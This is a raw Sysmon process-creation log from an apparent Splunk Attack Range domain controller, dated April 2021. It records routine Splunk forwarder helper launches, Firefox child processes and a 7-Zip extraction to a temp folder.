-o"C:\Users\ADMINI~1\AppData\Local\Temp\" -an 
-ai#7zMap281:108:7zEvent19775C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=04FB3AE7F05C8BC333125972BA907398,SHA256=2FB898BACB587F2484C9C4AA6DA2729079D93D1F923A017BB84BEEF87BF74FEF,IMPHASH=9CF6F80DD6DFE9900700C1E11C318B2A{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000024863Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:56:23.335{A8622C2F-4607-6078-BC05-00000000AE01}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000024843Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:56:21.953{A8622C2F-4605-6078-BB05-00000000AE01}4868C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000024831Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:56:21.287{A8622C2F-4605-6078-BA05-00000000AE01}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000024820Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:56:20.234{A8622C2F-4604-6078-B905-00000000AE01}7064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000024804Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:56:18.684{A8622C2F-4602-6078-B805-00000000AE01}5780C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000024786Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:56:18.006{A8622C2F-4602-6078-B705-00000000AE01}4672C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000024777Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:56:17.129{A8622C2F-4601-6078-B605-00000000AE01}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000023854Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:39.125{A8622C2F-45DB-6078-B505-00000000AE01}4520C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3312.34.670914474\847039290" -childID 5 -isForBrowser -prefsHandle 4424 -prefMapHandle 4788 -prefsLen 8227 -prefMapSize 235145 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3312 "\\.\pipe\gecko-crash-server-pipe.3312" 4828 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-45D3-6078-AE05-00000000AE01}3312C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000023664Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:34.469{A8622C2F-45D6-6078-B405-00000000AE01}2316C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3312.27.1149988546\1438748659" -childID 4 -isForBrowser -prefsHandle 4568 -prefMapHandle 4564 -prefsLen 8085 -prefMapSize 235145 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3312 "\\.\pipe\gecko-crash-server-pipe.3312" 4528 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-45D3-6078-AE05-00000000AE01}3312C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 
154100x800000000000000023537Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:33.988{A8622C2F-45D5-6078-B305-00000000AE01}5732C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3312.20.1460346272\1721553792" -childID 3 -isForBrowser -prefsHandle 3956 -prefMapHandle 3936 -prefsLen 7312 -prefMapSize 235145 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3312 "\\.\pipe\gecko-crash-server-pipe.3312" 3548 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-45D3-6078-AE05-00000000AE01}3312C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000023457Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:33.764{A8622C2F-45D5-6078-B205-00000000AE01}4392C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3312.13.379808757\1986658952" -childID 2 -isForBrowser -prefsHandle 3260 -prefMapHandle 3292 -prefsLen 7241 -prefMapSize 235145 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3312 "\\.\pipe\gecko-crash-server-pipe.3312" 3264 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-45D3-6078-AE05-00000000AE01}3312C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 
154100x800000000000000023387Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:33.469{A8622C2F-45D5-6078-B105-00000000AE01}936C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3312.6.567730962\620123395" -childID 1 -isForBrowser -prefsHandle 2092 -prefMapHandle 2088 -prefsLen 410 -prefMapSize 235145 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3312 "\\.\pipe\gecko-crash-server-pipe.3312" 2104 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92LowMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-45D3-6078-AE05-00000000AE01}3312C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000023344Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:33.180{A8622C2F-45D5-6078-B005-00000000AE01}6828C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3312.0.1988985872\1504275470" -parentBuildID 20210318103112 -prefsHandle 1408 -prefMapHandle 1376 -prefsLen 1 -prefMapSize 235145 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3312 "\\.\pipe\gecko-crash-server-pipe.3312" 1516 gpuC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92MediumMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-45D3-6078-AE05-00000000AE01}3312C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 
154100x800000000000000023308Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:31.898{A8622C2F-45D3-6078-AE05-00000000AE01}3312C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92MediumMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-45D3-6078-AD05-00000000AE01}4868C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000023298Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:31.874{A8622C2F-45D3-6078-AD05-00000000AE01}4868C:\Program Files\Mozilla Firefox\firefox.exe87.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A64451C6AB4EC7664C16F9AA082911B9,SHA256=EE77516268D63AC2CB4D76535F3B3BA04F085DE2F98FA32B45743FBB407B2A7E,IMPHASH=1627F1E69E2B2C24F8A7D08CC71D4B5E{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000023281Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:23.367{A8622C2F-45CB-6078-AC05-00000000AE01}4776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023267Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:21.945{A8622C2F-45C9-6078-AB05-00000000AE01}4424C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023256Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:21.273{A8622C2F-45C9-6078-AA05-00000000AE01}6060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023246Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:55:20.383{A8622C2F-45C8-6078-A905-00000000AE01}5428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023236Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:18.680{A8622C2F-45C6-6078-A805-00000000AE01}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023227Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:18.008{A8622C2F-45C6-6078-A705-00000000AE01}6296C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023217Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:55:17.133{A8622C2F-45C5-6078-A605-00000000AE01}6572C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023111Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:54:23.353{A8622C2F-458F-6078-A505-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000023099Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:54:21.838{A8622C2F-458D-6078-A405-00000000AE01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023086Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:54:21.259{A8622C2F-458D-6078-A305-00000000AE01}4156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023076Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:54:20.384{A8622C2F-458C-6078-A205-00000000AE01}5680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023066Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:54:18.681{A8622C2F-458A-6078-A105-00000000AE01}2708C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000023057Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:54:18.009{A8622C2F-458A-6078-A005-00000000AE01}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000023047Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:54:17.134{A8622C2F-4589-6078-9F05-00000000AE01}6596C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022962Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:53:23.339{A8622C2F-4553-6078-9E05-00000000AE01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022931Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:53:21.932{A8622C2F-4551-6078-9D05-00000000AE01}7076C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
